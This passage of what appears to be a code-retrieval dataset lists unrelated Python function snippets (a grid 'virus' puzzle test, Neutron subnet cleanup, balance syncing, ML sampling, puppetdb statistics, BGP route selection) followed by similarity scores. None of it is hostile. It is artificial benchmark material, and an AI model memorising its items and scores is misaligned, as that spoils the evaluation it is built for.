p22.Position(0, 0) # moved up\n assert cluster.infected[prev_pos] == p22.State.Clean # cleaned\n # four times in a row finds clean and infects\n\n for _ in range(4):\n assert cluster.infected[cluster.virus.pos] == p22.State.Clean\n prev_pos = cluster.virus.pos\n cluster.burst()\n assert cluster.infected[prev_pos] == p22.State.Infected\n assert cluster.virus.pos == p22.Position(0, 0)\n prev_pos = cluster.virus.pos\n cluster.burst()\n assert cluster.virus.direction == p22.Directions.right\n assert cluster.virus.pos == p22.Position(0, 1)\n assert cluster.infected[prev_pos] == p22.State.Clean\n assert cluster.infections_caused == 5", "def run(self):\n tenant_id = self.context[\"tenant\"][\"id\"]\n users = self.context[\"tenants\"][tenant_id][\"users\"]\n number = users.index(self.context[\"user\"])\n for network in self.context[\"tenants\"][tenant_id][\"networks\"]:\n # delete one of subnets based on the user sequential number\n subnet_id = network[\"subnets\"][number]\n self.neutron.delete_subnet(subnet_id)", "def grade_inst(inst, population):\n \n # Initialize to keep track of score \n inst_score = 0\n \n # Battle against each instance in population\n for i in range(len(population)):\n battle_result = inst.battle(population[i])\n inst_score += battle_result[0]\n \n # Also record the score in the instance\n inst.set_score(inst_score)\n\n return inst_score", "def __init__(self):\n self.balance = 0", "async def _update_balances(self):\n local_asset_names = set(self._account_balances.keys())\n remote_asset_names = set()\n resp_json = await self._api_request(\"post\",\n \"terra/balances\",\n {\"address\": self._terra_wallet_address})\n for token, bal in resp_json[\"balances\"].items():\n self._account_available_balances[token] = Decimal(str(bal))\n self._account_balances[token] = Decimal(str(bal))\n remote_asset_names.add(token)\n\n asset_names_to_remove = local_asset_names.difference(remote_asset_names)\n for asset_name in asset_names_to_remove:\n del self._account_available_balances[asset_name]\n del self._account_balances[asset_name]\n\n self._in_flight_orders_snapshot = {k: copy.copy(v) for k, v in self._in_flight_orders.items()}\n self._in_flight_orders_snapshot_timestamp = self.current_timestamp", "def update_borough_boundaries():\n results = SOCRATA_CLIENT.get(BOROUGH_BOUNDARIES_ID)\n\n df = pd.DataFrame.from_records(results)\n df = df.fillna(\"null\")\n return 
df", "def test_irr_with_overlap(self):\n\n r = \"\"\"12-30-2000 open a\n 12-30-2000 open b\n\n 12-31-2000 balances\n ---\n a 0\n b 0\n\n from 01-01-2002 until 06-30-2002\n ---\n b -> a 50000\n\n from 02-01-2002 until 03-31-2002\n ---\n b -> a 50000\n\n from 03-01-2002 until 04-01-2002\n ---\n b -> a 50000\n\n 06-30-2002 balances\n ---\n a 120000\n\n 12-31-2002 balances\n ---\n a 175000\n \"\"\"\n accts = read_bnk_data(r)['Account']\n if WriteCSVs:\n with open('test_irr-test_irr_with_overlap-1-a.csv', 'w') as fout:\n accts['a'].to_csv(fout)\n\n irr = accts['a'].get_irr(dt.date(2000, 12, 31), dt.date(2002, 12, 31))\n irounded = (round(irr[0], 3), round(irr[1], 3))\n # Using XIRR in LibreOffice (TEST 1)\n self.assertEqual(irounded, (18.34, 25.828))\n\n irr = accts['a'].get_irr(dt.date(2000, 12, 31), dt.date(2002, 6, 30))\n irounded = (round(irr[0], 3), round(irr[1], 3))\n # Using XIRR in LibreOffice (TEST 2)\n self.assertEqual(irounded, (-76.272, -41.99))", "def __init__(self):\n\n # sample must be between 0 and 1\n if self.sample <= 0 or self.sample > 1:\n raise Exception('sample {} should be > 0 and <= 1'.format(self.sample))\n\n # sample RDD if sample is specified AND rdd has not been pre-sampled\n if self.sample < 1 and not self.pre_sampled:\n self.rdd = self.rdd.sample(False, self.sample, self.seed)\n\n # Assign each RDD with counter. Reduce and collect.\n collectedCounts = self.rdd.reduceByKey(lambda x,y: x+y) \\\n .collect() # (id, count), number of times that count appears)\n\n # function that re-calculates coverage based on sampling\n approximateCounts = lambda counts, sample: int(counts * 1.0/sample)\n\n # restructure each record so record structure is (key: sampleId, value: (coverage, count))\n x = list(map(lambda x: (x[0][0], (x[0][1], approximateCounts(x[1], self.sample))), collectedCounts))\n\n # create dictionary where keys are the sampleId\n self.collectedCounts = collections.defaultdict(set)\n for k, v in x:\n self.collectedCounts[k].add(v)", "def test_numpy_occupancy_compare(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_numpy()\n\n _, _, y_train, y_test = tts(X, y, test_size=0.4, random_state=2242)\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y_train, y_test) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz, tol=0.5) # w/o tol fails with RMS 0.433", "def __run_instances(self, number=1, policies={}):\n try:\n self.euca = Euca2ool('k:n:t:g:d:f:z:',\n ['key=', 'kernel=', 'ramdisk=', 'instance-count=', 'instance-type=',\n 'group=', 'user-data=', 'user-data-file=', 'addressing=', 'availability-zone='])\n except Exception, ex:\n sys.exit(1)\n\n instance_type = policies.get('instance_type') or 'm1.small'\n image_id = policies.get('image_id') or self.__get_image_id()[0]\n min_count = number\n max_count = number\n keyname = 'mykey'\n \n kernel_id = None\n ramdisk_id = None\n group_names = []\n user_data = None\n addressing_type = None\n zone = None\n user_data = None\n \n if image_id:\n euca_conn = self.__make_connection()\n try:\n reservation = euca_conn.run_instances(image_id = image_id,\n min_count = min_count,\n max_count = max_count,\n key_name = keyname,\n security_groups = group_names,\n user_data = user_data,\n addressing_type = addressing_type,\n instance_type = instance_type,\n placement = zone,\n kernel_id = kernel_id,\n ramdisk_id = ramdisk_id)\n except Exception, ex:\n self.euca.display_error_and_exit('error:%s' % ex)\n return reservation\n return False", "def reconcile(self):\r\n\t\tclass_A = 
np.empty((self.basis.nK,self.basis.nK),float)\r\n\t\tclass_G = np.empty((self.basis.nK,self.basis.nK),float)\r\n\t\tclass_koop = np.empty((self.basis.nK,self.basis.nK),float)\r\n\t\tclass_num = len(self.koop_cluster_list)\r\n\t\tfor i in range(class_num):\r\n\t\t\tclass_mem_num = len(self.koop_cluster_list[i])\r\n\t\t\tclass_counter = 0.0\r\n\t\t\tfor j in range(class_mem_num):\r\n\t\t\t\tclass_A += (self.koop_cluster_list[i][j]._A*self.koop_cluster_memb_prob_list[i][j])/float(class_mem_num)\r\n\t\t\t\tclass_G += (self.koop_cluster_list[i][j]._G*self.koop_cluster_memb_prob_list[i][j])/float(class_mem_num)\r\n\t\t\t\tclass_counter += self.koop_cluster_list[i][j].counter\r\n\t\t\tclass_koop = np.dot(np.linalg.pinv(class_G),class_A)\r\n\t\t\tself.koopman_hybrid_modes.append(KoopmanOperator(self.basis, class_koop, class_A, class_G, class_counter))", "def balanced_sampling(dat: pd.DataFrame, logger=None):\n if logger == None:\n logging.basicConfig(\n level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(__name__)\n \n \n # upsampling\n logger.info('Start balanced sampling')\n subsample = []\n num_of_each_class = dat.iloc[:, -1].value_counts().to_numpy()\n if num_of_each_class.std()*1.0 / num_of_each_class.mean() < 0.1:\n logger.info('The given data is balance.')\n # the dataset is balanced\n return dat\n logger.info('Given dataset is unbalance')\n logger.info('Sampling data from each class to generate a new dataset')\n n_smp = num_of_each_class.max()\n for label in dat.iloc[:, -1].value_counts().index:\n samples = dat[dat.iloc[:, -1] == label]\n num_samples = len(samples)\n index_range = range(num_samples)\n # take all from the set\n indexes = list(np.random.choice(index_range, size=num_samples, replace=False))\n indexes2 = list(np.random.choice(\n index_range, size=n_smp-num_samples, replace=True)) # add random items\n indexes.extend(indexes2)\n subsample.append(samples.iloc[indexes, :])\n logger.info('End with sampling')\n out = pd.concat(subsample)\n out = out.sample(frac=1).reset_index(drop=True) # shuffle and re index\n return out", "def do(self):\n from backend.modules.patient.models import Patient\n patients = Patient.objects.all()\n for patient in patients:\n self.service.rank_by_object(patient)", "def gini(self, rows):\n counts = self.class_counts(rows)\n impurity = 1\n for lbl in counts:\n prob_of_lbl = counts[lbl] / float(len(rows))\n impurity -= prob_of_lbl**2\n return impurity", "def classify():\n yes_dataset = df[df[\"_class\"] == 1] # 470588\n no_dataset = df[df[\"_class\"] == 0] # 1971\n\n parameter_analysis = list()\n for criterion in np.arange(0.05, 0.91, 0.05):\n print(\"doing experiment at criterion = %s ...\" % criterion)\n rate_list = list()\n for i in range(10):\n # shuffle yes_dataset and no_dataset, so we can randomly choose 90% yes_dataset\n # + 90% no_dataset as train dataset, 10% yes_dataset + 10% no_dataset as test dataset\n yes_index = yes_dataset.index.tolist()\n random.shuffle(yes_index)\n no_index = no_dataset.index.tolist()\n random.shuffle(no_index)\n \n # concatenate 90%yes + 90%no, 10%yes + 10%no\n train = pd.concat([\n yes_dataset.loc[yes_index[:1774], :],\n no_dataset.loc[no_index[:423530], :]\n ])\n test = pd.concat([\n yes_dataset.loc[yes_index[1774:], :],\n no_dataset.loc[no_index[423530:], :]\n ]) \n \n # split data and label\n train_data, train_label = (train[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n train[\"_class\"])\n 
test_data, test_label = (test[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n test[\"_class\"])\n \n # apply classifier\n clf = GaussianNB()\n clf.fit(train_data, train_label)\n probability = clf.predict_proba(test_data).T[1]\n \n result = pd.DataFrame()\n result[\"_class\"] = test_label\n result[\"_predict\"] = probability >= criterion\n \n result_yes = result[result[\"_class\"] == 1]\n yes_yes_rate = sum(result_yes[\"_class\"] == result_yes[\"_predict\"])/len(result_yes[\"_predict\"])\n \n result_no = result[result[\"_class\"] == 0]\n no_no_rate = sum(result_no[\"_class\"] == result_no[\"_predict\"])/len(result_no[\"_predict\"])\n \n rate_list.append((yes_yes_rate, no_no_rate))\n\n rate_list = pd.DataFrame(rate_list)\n yes_yes_rate, no_no_rate = rate_list.mean()[0], rate_list.mean()[1]\n parameter_analysis.append((criterion, yes_yes_rate, no_no_rate))\n \n # save data to excel spreadsheet\n parameter_analysis = pd.DataFrame(parameter_analysis, columns=[\"criterion\", \"yes_yes_rate\", \"no_no_rate\"])\n writer = pd.ExcelWriter(\"parameter_analysis.xlsx\")\n parameter_analysis.to_excel(writer, \"parameter_analysis\", index=False)\n writer.save()", "def oracle(dataset: Dataset, conf: Namespace) -> np.ndarray:\n # Copy dataframe and set up test and score columns\n df = dataset.df.copy()\n df['test'] = df['fold'] == dataset.fold\n df['score'] = df[dataset.feature]\n\n # Compute calibrated score here, start as zeros\n calibrated_score = np.zeros_like(df['score'], dtype='float')\n\n # Get each combination of sensitive attributes (in this case only consider ethnicity)\n print(\"Computing results for subgroups...\")\n for subgroup in dataset.iterate_subgroups():\n\n # Set up select mask for left and right image, initialize as all True\n select = np.full_like(calibrated_score, True, dtype=bool) # TODO this can be cleaner\n\n # Iterate attributes of subgroup\n for attribute in subgroup:\n\n # Get columns of current attribute, is always only 2 (for left and right image)\n for col in dataset.consts['sensitive_attributes'][attribute]['cols']:\n # Update masks for both images of current attribute value\n select &= (df[col] == subgroup[attribute])\n\n # Mask to select the train data of the above select\n select_train = select & (df['test'] == False)\n\n # Set up calibrator on train set of current subgroup\n calibrator = BetaCalibration(df['score'][select_train], df['same'][select_train], score_min=-1, score_max=1)\n\n # Use calibrator on all data\n calibrated_score[select] = calibrator.predict(df['score'][select])\n\n return calibrated_score", "def get_all_bw_counters(self, instances):\n bw = []\n return bw", "def radiator(env):\n envs = environments()\n check_env(env, envs)\n\n if env == '*':\n query_type = ''\n if get_db_version(puppetdb) < (4, 0, 0):\n query_type = 'type=default,'\n query = None\n metrics = get_or_abort(\n puppetdb.metric,\n 'puppetlabs.puppetdb.population:%sname=num-nodes' % query_type)\n num_nodes = metrics['Value']\n else:\n query = AndOperator()\n metric_query = ExtractOperator()\n\n query.add(EqualsOperator(\"catalog_environment\", env))\n query.add(EqualsOperator(\"facts_environment\", env))\n metric_query.add_field(FunctionOperator('count'))\n metric_query.add_query(query)\n\n metrics = get_or_abort(\n puppetdb._query,\n 'nodes',\n query=metric_query)\n num_nodes = metrics[0]['count']\n\n nodes = puppetdb.nodes(\n query=query,\n unreported=app.config['UNRESPONSIVE_HOURS'],\n with_status=True\n )\n\n stats = 
{\n 'changed_percent': 0,\n 'changed': 0,\n 'failed_percent': 0,\n 'failed': 0,\n 'noop_percent': 0,\n 'noop': 0,\n 'skipped_percent': 0,\n 'skipped': 0,\n 'unchanged_percent': 0,\n 'unchanged': 0,\n 'unreported_percent': 0,\n 'unreported': 0,\n }\n\n for node in nodes:\n if node.status == 'unreported':\n stats['unreported'] += 1\n elif node.status == 'changed':\n stats['changed'] += 1\n elif node.status == 'failed':\n stats['failed'] += 1\n elif node.status == 'noop':\n stats['noop'] += 1\n elif node.status == 'skipped':\n stats['skipped'] += 1\n else:\n stats['unchanged'] += 1\n\n try:\n stats['changed_percent'] = int(100 * (stats['changed'] /\n float(num_nodes)))\n stats['failed_percent'] = int(100 * stats['failed'] / float(num_nodes))\n stats['noop_percent'] = int(100 * stats['noop'] / float(num_nodes))\n stats['skipped_percent'] = int(100 * (stats['skipped'] /\n float(num_nodes)))\n stats['unchanged_percent'] = int(100 * (stats['unchanged'] /\n float(num_nodes)))\n stats['unreported_percent'] = int(100 * (stats['unreported'] /\n float(num_nodes)))\n except ZeroDivisionError:\n stats['changed_percent'] = 0\n stats['failed_percent'] = 0\n stats['noop_percent'] = 0\n stats['skipped_percent'] = 0\n stats['unchanged_percent'] = 0\n stats['unreported_percent'] = 0\n\n if ('Accept' in request.headers and\n request.headers[\"Accept\"] == 'application/json'):\n return jsonify(**stats)\n\n return render_template(\n 'radiator.html',\n stats=stats,\n total=num_nodes\n )", "def __test_load_imbalance(L, S, A, R, Y):\n return load_imbalance(Y,L,A)", "def __iteratively_retain(\n self,\n orf_regions: List[Tuple[int, int]]) -> List[Tuple[int, int]]:\n\n ret = []\n\n arr = np.zeros((len(self.seq), ))\n\n for start, end in orf_regions:\n ret.append((start, end))\n arr[start-1:end] = 1\n orf_coverage = np.sum(arr) / len(arr)\n if orf_coverage > self.min_orf_coverage:\n break\n\n return ret", "def gini(rows):\n counts = class_counts(rows)\n print(counts)\n impurity = 1\n for lbl in counts:\n prob_of_lbl = counts[lbl] / float(len(rows))\n impurity -= prob_of_lbl**2\n return impurity", "def CrossCheck(dataloader):", "def prune(i):\n\n return {'return':1, 'error':'pruning is not yet supported in this scenario'}", "def decision_process(self) -> None:\n # order routes by preference\n self.adj_rib_in.preference_ordering()\n # for each route insert the best in the loc_rib\n for destination in self.adj_rib_in:\n best_route = destination[0]\n # if there as been a change insert the new route in the adj-rib-out\n old_best = None\n if self.loc_rib.exists(best_route):\n old_best = self.loc_rib[best_route]\n if self.loc_rib.insert(best_route) is not None:\n for neigh in self.nodes_rib_out:\n # Case 1, the RIB out doesn't contains a route for the destination\n if not self.nodes_rib_out[neigh].exists(best_route):\n # Insert the new best as an Advertisement\n self.nodes_rib_out[neigh].insert(best_route)\n # If the Old best is not none insert it as a withdraw\n if old_best is not None and \\\n not self.nodes_rib_out[neigh].exists_withdraws(best_route):\n self.nodes_rib_out[neigh].insert_withdraw(old_best)\n # Case 2, The Rib contains a Route for the detination\n else:\n # Remove the route from the advertisements\n self.nodes_rib_out[neigh].remove(old_best)\n if len(self.nodes_rib_out[neigh][old_best]) == 0:\n del self.nodes_rib_out[neigh][old_best]\n # If the route in the withdraws is equal to the new best don't do anything\n # Otherwise insert the new route as an advertisement\n if 
self.nodes_rib_out[neigh].exists_withdraws(best_route) and \\\n best_route in self.nodes_rib_out[neigh].get_withdraws(best_route):\n self.nodes_rib_out[neigh].remove_from_withdraws(best_route)\n else:\n self.nodes_rib_out[neigh].insert(best_route)\n # Evaluation if something has to be removed from the LOC rib and withdrawd\n for destination in self.loc_rib:\n if not self.adj_rib_in.exists(destination):\n del self.loc_rib[destination]\n for neigh in self.nodes_rib_out:\n # if self.nodes_rib_out[neigh].exists(destination):\n # del self.nodes_rib_out[neigh][destination]\n self.nodes_rib_out[neigh].insert_withdraw(destination)", "def _balances(self) -> Dict[str, int]:\n\n return self.client.get(self._resources(\"balance\"))", "def compute_statistics(self):" ]
[ "0.57167405", "0.570118", "0.5557484", "0.5479032", "0.5437137", "0.5420406", "0.5420168", "0.5331262", "0.53278494", "0.5277977", "0.5214856", "0.5206903", "0.51943547", "0.5191577", "0.5144731", "0.5080557", "0.5061859", "0.5055446", "0.5047951", "0.5047951", "0.502992", "0.5025928", "0.49741614", "0.49303448", "0.49277928", "0.49232578", "0.49193674", "0.4907208", "0.4899866", "0.48954886", "0.48924613", "0.48702243", "0.48653147", "0.48489785", "0.48396292", "0.48393363", "0.4834783", "0.4826847", "0.48255596", "0.48176247", "0.48126063", "0.48089144", "0.48035535", "0.47978997", "0.47703955", "0.4763296", "0.47458494", "0.4743917", "0.4737341", "0.47366825", "0.4734417", "0.47166786", "0.47104606", "0.4709417", "0.46933106", "0.46927994", "0.4689279", "0.4686827", "0.46829695", "0.4681995", "0.46799555", "0.46763563", "0.46744087", "0.4670964", "0.46709582", "0.46629134", "0.46616676", "0.46498147", "0.46453664", "0.46368378", "0.4628084", "0.46243814", "0.46167213", "0.46124583", "0.4609811", "0.46072188", "0.46010727", "0.46003428", "0.45990217", "0.45978084", "0.4596454", "0.45944893", "0.45922345", "0.45919055", "0.45880502", "0.4587742", "0.45872673", "0.45869914", "0.4586496", "0.4582051", "0.45761833", "0.4570396", "0.45698726", "0.45689407", "0.4562313", "0.45586032", "0.45541", "0.45540938", "0.45537484", "0.45528427" ]
0.527201
10
Find the maximum number of ROIs per batch sample in the dataset
def get_max_rois(self):
    maxsize = 0
    for index in self.SampleID:
        rois = self.__getrois__(index)
        maxsize = max(maxsize, rois.shape[0])
    return maxsize
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __len__(self):\n return int(np.ceil(self.max_index / float(self.batch_size)))", "def max_num_batches(self):\n return self._max_num_batches", "def max_individuals(self) -> int:\n return self.group_size.upper * self.groups_allowed", "def __len__(self):\n return int(np.ceil(len(self.ids) / self.batch_size))", "def get_max_rows_per_partition() -> int:\n pass", "def __len__(self):\n return int(np.floor(len(self.dataset_df) / self.batch_size))", "def ExpectedMaxBatchSizes(self, run_params):\n return self.max_batch_sizes", "def __len__(self):\n return int(np.floor(len(self.ids) / self.batch_size))", "def batch_size(self):\n if self._batch_size is not None:\n return self._batch_size # custom batch size defined\n if self.task == 'objdet':\n return 8\n annos_per_img = self._annos_per_img[self.dataset]\n if self.task in {'predcls', 'sgcls'}:\n annos_per_img = annos_per_img['pairs']\n elif self.task == 'objcls':\n annos_per_img = annos_per_img['objects']\n elif self.task == 'preddet' and self.filter_multiple_preds:\n annos_per_img = annos_per_img['predicates_filtered']\n elif self.task == 'preddet' and self.filter_duplicate_rels:\n annos_per_img = annos_per_img['duplicates_filtered']\n elif self.task in {'preddet', 'sggen'}:\n annos_per_img = annos_per_img['relations']\n batch_size = ceil(self._annotations_per_batch / annos_per_img)\n return max(batch_size, 2)", "def num_of_cancerous_pixels(batch, max_num=10):\n stats = dict()\n n_print = min(max_num, len(batch))\n for i in range(n_print):\n stats.update({'Scan ' + str(i): int(np.sum(batch.get(i, 'masks')))})\n\n stats = {'Number of cancerous pixels: ': stats}\n stats_df = pd.DataFrame.from_dict(stats, orient='index').loc[:, ['Scan '+ str(i) for i in range(n_print)]]\n return stats_df", "def max_counts(self):\n\n return np.nanmax(self.pre_proc_data)", "def batch_size(self) -> int:\n ...", "def get_num_batches(self,batch_size):\r\n \r\n return len(self) // batch_size", "def __len__(self):\n return int(np.ceil(self.total_frame_count / self.batch_size))", "def maximum_count(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"maximum_count\")", "def load_max(self):\n return max(self.load_samples)", "def __len__(self):\n gen_len = len(self.image_ids) // self.batch_size\n if len(self.image_ids) % self.batch_size != 0:\n gen_len += 1\n return gen_len", "def getEpochCount(rawStimData, epochColumn=3):\n # get the max epoch count from the rawStimData\n # 4th column is the epoch number\n # add plus 1 since the min epoch no is zero\n \n # BG edit: Changed the previous epoch extraction, which uses the maximum \n # number + 1 as the epoch number, to a one finding the unique values and \n # taking the length of it\n epochCount = np.shape(np.unique(rawStimData[:, epochColumn]))[0]\n print(\"Number of epochs = \" + str(epochCount))\n\n return epochCount", "def __len__(self):\n return math.ceil(self.number_of_images / self.batch_size)", "def _min_sampled_from_batch(self):\n return min([col._last_batch_size for col in self._profile], default=0)", "def get_max_run(run):\n max = 0\n max_i = 0\n for i in range(800, 900):\n if int(run[i]) > int(max):\n max = run[i]\n max_i = i\n return max, max_i", "def find_max_nr_doc(data):\n queries = list(set(data[:, 1].astype(int)))\n max_nr = 0\n for query in queries:\n n_max = data[data[:,1] == query].shape[0]\n if n_max > max_nr:\n max_nr = n_max\n return max_nr", "def max_size(self):\n sizes = np.array([m.sum() for m in self.masks])\n return sizes.max()", "def get_max_readings( self ):\n return 2500", "def 
_update_num_batches(self):\n # maximum possible number of batches is equal to number of whole times\n # batch_size divides in to the number of data points which can be\n # found using integer division\n possible_num_batches = self.inputs.shape[0] // self.batch_size\n if self.max_num_batches == -1:\n self.num_batches = possible_num_batches\n else:\n self.num_batches = min(self.max_num_batches, possible_num_batches)", "def ram_max(self):\n return max(self.ram_samples)", "def max(self):\r\n\t\treturn max(self.sample)", "def recommended_max_num_datapoints(self) -> int:\n # very large number, essentially no limit by default\n return 1e9", "def _get_max_answers(self):\n return max([len(x) for x in self.labels])", "def _max_col_samples_used(self):\n samples_used = 0\n for col in self._profile:\n samples_used = max(samples_used, col.sample_size)\n return samples_used", "def __len__(self):\n return int(np.ceil(len(self.image_filenames) / (self.batch_size)))", "def batch_size(self):\n self.validate_shape_and_dtype()\n return self.rgb.shape[0]", "def n_samples(self) -> int: # pragma: no cover\n return self.samples.shape[0]", "def max_scoring_num_rolls(dice=six_sided, num_samples=1000):\n # BEGIN PROBLEM 8\n\n \"\"\"maxi, number_of_dice, ret = 0, 10, 0\n while number_of_dice > 0:\n avg = make_averaged(roll_dice)(number_of_dice, dice)\n maxi = max(maxi, avg)\n if avg >= maxi:\n ret = number_of_dice\n number_of_dice -= 1\n return ret\"\"\"\n\n\n\n counterA = 1\n num_rolls=1\n max_value = 0\n best_num_rolls = 0\n while counterA <= 10:\n num_rolls = counterA\n average_function = make_averaged(roll_dice)(counterA, dice)\n if average_function > max_value:\n max_value = average_function\n best_num_rolls = counterA\n counterA +=1\n return best_num_rolls\n\n \"\"\"counterA = 1\n maxvalue = 0\n maxvaluenumber = 0\n while(counterA<=10):\n num_rolls = counterA\n average_for_roll = make_averaged(roll_dice(num_rolls, dice), num_samples)\n counterB = average_for_roll(roll_dice(counterA, dice))\n if(counterB>maxvalue):\n maxvalue = counterB\n maxvaluenumber = counterA\n counterA +=1\n return maxvaluenumber\"\"\"\n # END PROBLEM 8", "def max_scoring_num_rolls(dice=six_sided, num_samples=1000):\n # BEGIN PROBLEM 9\n \"*** YOUR CODE HERE ***\"\n k, max_value, max_num = 1, 0, 0\n roll = make_averaged(roll_dice, num_samples)\n while k <= 10:\n current_value = roll(k, dice)\n #print('k: ' + str(k) + ' current_value: ' + str(current_value))\n if current_value > max_value:\n max_value, max_num = current_value, k\n k += 1\n return max_num\n # END PROBLEM 9", "def get_max_batch_size(model, tile_size, device, classes):\n\n # get number of trainable parameters\n total_param = 0\n for name, param in model.named_parameters():\n if param.requires_grad:\n num_param = np.prod(param.size())\n total_param += num_param\n \n # get available GPU memory\n gpu_stats = gpustat.GPUStatCollection.new_query()\n item = gpu_stats.jsonify()[\"gpus\"][device]\n gpu_mem = (item[\"memory.total\"] - item[\"memory.used\"])*1E6*1.04858\n\n # max batch size\n max_batch_size = int(gpu_mem/(8*classes*(total_param+tile_size*tile_size))) - 1\n if max_batch_size < 1:\n max_batch_size = 1\n return max_batch_size", "def get_number_samples(self):\n return self.samples.shape[0]", "def _number_of_samples(self):\n return len(self._raw_data.samples)", "def get_max_size(self):\n max_size = 0\n file = h5py.File(self.filename, 'r')\n for idx in range(len(self)):\n label = self.labels[idx]\n timestamps_group = file['/'][self.mode + '_timestamps']\n timestamps_dset = 
timestamps_group[label]\n size = len(timestamps_dset)\n if size > max_size: max_size = size\n file.close()\n return max_size\n\n # max_size = 0\n # for i in range(len(self)):\n # item = self[i][0]\n # if len(item) > max_size:\n # max_size = len(item)\n # return max_size", "def batch_size(self):\n return self._first_rgb.shape[0]", "def batch_len(batch):\n flatlist, _ = tree_util.tree_flatten(batch)\n if len(flatlist) < 1:\n return 0\n b = flatlist[0].shape[0]\n assert all(\n arr.shape[0] == b for arr in flatlist if th.is_tensor(arr)\n ), \"Not all arrays have same batchsize!\"\n return b", "def n_rounds(self) -> int:\n return self.y.shape[0]", "def get_last_number_of_samples(self):\n return mpi.globNumSamples", "def number_of_batches(self):\n return int(np.floor(len(self.file_paths_list) / self.batch_size))", "def __len__(self) -> int:\n return int(np.floor(len(self.list_IDs) / self.batch_size))", "def maxContigLength(self):\n\t\tstats = self.scores()\n\t\treturn stats['largestContig']", "def get_max_num_runs(self, db):\n res = db.session.query(func.max(db.ExperimentResult.run)).filter_by(experiment=self).first()\n if res is None or res[0] is None: return 0\n return res[0] + 1", "def batch_size(features, labels):\n return extract_batch_length(features)", "def get_batch_size():\n return get_global_variable(GraphKeys.BATCH_SIZE)", "def n_train(self):\n return self.factors[0].shape[0]", "def get_evaluation_batch_size():\n return 1", "def get_max_depth_val():\n data = SUNRGBDTrainDataset(True)\n return max([data[0][i][-1].flatten().item() for i in range(len(data))])", "def __len__(self):\n if not self.opt.union:\n return min(len(self.dataset), self.opt.max_dataset_size)\n else:\n return len(self.batch_sampler)", "def __len__(self):\r\n return int(np.floor(len(self.list_IDs) / self.batch_size))", "def batch_size(self):\n return self.size", "def max_mireds(self):\n return 333", "def size(self, batch):\n x,y,m = batch \n return sum([mm.sum() for mm in m])", "def max_level(data: np.ndarray) -> int:\n shape = data.shape[1:] # exclude channel dimension\n return min(shape).bit_length() - 1", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def __len__(self):\n return int(np.floor(len(self.list_ids) / self.batch_size))", "def max_scoring_num_rolls(dice=six_sided, num_samples=1000):\n # BEGIN PROBLEM 9\n averaged_dice = make_averaged(roll_dice, num_samples)\n max_score = 0\n result = 0\n for num_rolls in range(1, 11):\n average_turn_score = averaged_dice(num_rolls, dice)\n if average_turn_score > max_score:\n max_score = average_turn_score\n result = num_rolls\n elif average_turn_score == max_score: # if tied, lower num rolls\n if num_rolls < result:\n max_score = average_turn_score\n result = num_rolls\n return result\n # END PROBLEM 9", "def __len__(self):\n nsamp = self.data.shape[-1]\n kernel = int(self.kernel * self.fs)\n stride = int(self.stride * self.fs)\n n_stride = int(np.ceil((nsamp - kernel) / stride) + 1)\n return max(0, n_stride)", "def batch_size(self) -> pulumi.Output[Optional[int]]:\n return pulumi.get(self, \"batch_size\")", "def __len__(self):\n return 
int(np.floor(len(self.list_IDs) / self.batch_size))", "def __len__(self):\n return int(np.floor(len(self.list_IDs) / self.batch_size))", "def __len__(self):\n return int(np.floor(len(self.list_IDs) / self.batch_size))", "def max_obj_dets_per_img(self):\n return min(64, self._annos_per_img[self.dataset]['max_objects'])", "def __len__(self):\n return self.limit_batches", "def take_max_rwr(rwr_walks):\n max_rwr = []\n for rwr in rwr_walks:\n if len(rwr) > len(max_rwr):\n max_rwr = rwr\n else:\n pass\n image_numb = len(max_rwr)\n\n return max_rwr, image_numb", "def _max_periods(self):\n return self.data.shape[0]", "def get_max_iters():\n return 2000", "def __len__(self) -> int:\n num_batches, remainder = divmod(len(self.mapped_triples), self.batch_size)\n if remainder and not self.drop_last:\n num_batches += 1\n return num_batches", "def max_batchwise(data_source, batch_size=1024):\n max_val = np.zeros(data_source.dshape, dtype=np.float32)\n\n for x, _ in iterate_batches(data_source, batch_size, expand=True):\n max_val = np.maximum(max_val, np.abs(x).max(axis=0))\n\n return max_val", "def node_count_max(self) -> int:\n return int(self.graph_tuple_stats.node_count_max or 0)", "def __len__(self):\n return math.ceil(len(self._sampler) / self._batch_size)", "def get_max_feat_id(self):\n total_nb = 0\n try:\n with open(os.path.join(self.base_update_path,self.master_update_file),'rt') as master_file:\n # sum up sizes of files in master_file\n for line in master_file:\n statinfo = os.stat(os.path.join(self.hashing_outpath,line.strip()+'_itq_norm_'+str(self.bits_num)))\n total_nb += statinfo.st_size*8/self.bits_num\n except Exception as inst:\n print \"[HasherSwig.get_max_feat_id: error] {}\".format(inst)\n return total_nb", "def max_mireds(self) -> int:\n return MIREDS_MAX", "def test_max_number_of_records(self):\n self._config['Number of examples'] = '2'\n result = self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)\n self.assertLen(result, 2)", "def getMaxMancount(self):\n return self.__size * 20", "def count_max(alon):\n return count_max_acc(alon, alon[0], 0, 0)", "def get_max_preds(batch_heatmaps):\n assert isinstance(batch_heatmaps, np.ndarray), \\\n 'batch_heatmaps should be numpy.ndarray'\n assert batch_heatmaps.ndim == 4, 'batch_images should be 4-ndim'\n batch_size = batch_heatmaps.shape[0]\n num_joints = batch_heatmaps.shape[1]\n width = batch_heatmaps.shape[3]\n heatmaps_reshaped = batch_heatmaps.reshape((batch_size, num_joints, -1))\n idx = np.argmax(heatmaps_reshaped, 2)\n maxvals = np.amax(heatmaps_reshaped, 2)\n maxvals = 